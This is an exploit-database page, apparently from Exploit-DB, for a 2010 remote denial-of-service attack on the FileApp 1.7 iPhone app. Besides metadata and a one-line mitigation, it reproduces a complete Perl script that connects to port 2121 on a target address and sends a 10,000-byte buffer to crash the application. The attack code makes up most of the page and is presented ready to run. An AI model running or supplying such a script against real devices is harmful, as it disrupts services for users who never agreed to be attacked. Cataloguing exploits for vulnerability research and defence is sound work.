FileApp - Remote Dos Exploit

vendor:

FileApp

by:

Ale46

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: FileApp

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: NO

Related CWE: N/A

CPE: a:digidna:fileapp

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Iphone 3GS with 3.1.2 firmware

2010

FileApp – Remote Dos Exploit

This exploit is used to crash the FileApp application on Iphone 3GS with 3.1.2 firmware. The exploit sends a large amount of data to the application's port 2121, causing it to crash and return to the SpringBoard.

Mitigation:

Disable the application's port 2121 or limit the amount of data that can be sent to it.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Exploit: FileApp - Remote Dos Exploit
# Date: 17/02/10
# Author: Ale46
# Software Link: http://www.digidna.net/products/fileapp
# Version: 1.7
# Tested on: Iphone 3GS with 3.1.2 firmware
#Go in the sharing section of FileApp and run this script, the
application crash and your Iphone\Ipod returns to the SpringBoard

use IO::Socket;

if (@ARGV<1){
        print ("Usage: ./fileapp <server_ip>\n");
        exit();
    }

my $host = $ARGV[0];
my $port = 2121;
my $stuff = "A"*10000;
my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => $port);
unless ($socket) { die "Can\'t connect to $host" }
print "Sending evil buffer..\n";
sleep(2);
print $socket $stuff;
sleep(1);
print "Now your app is.. Dosed :D";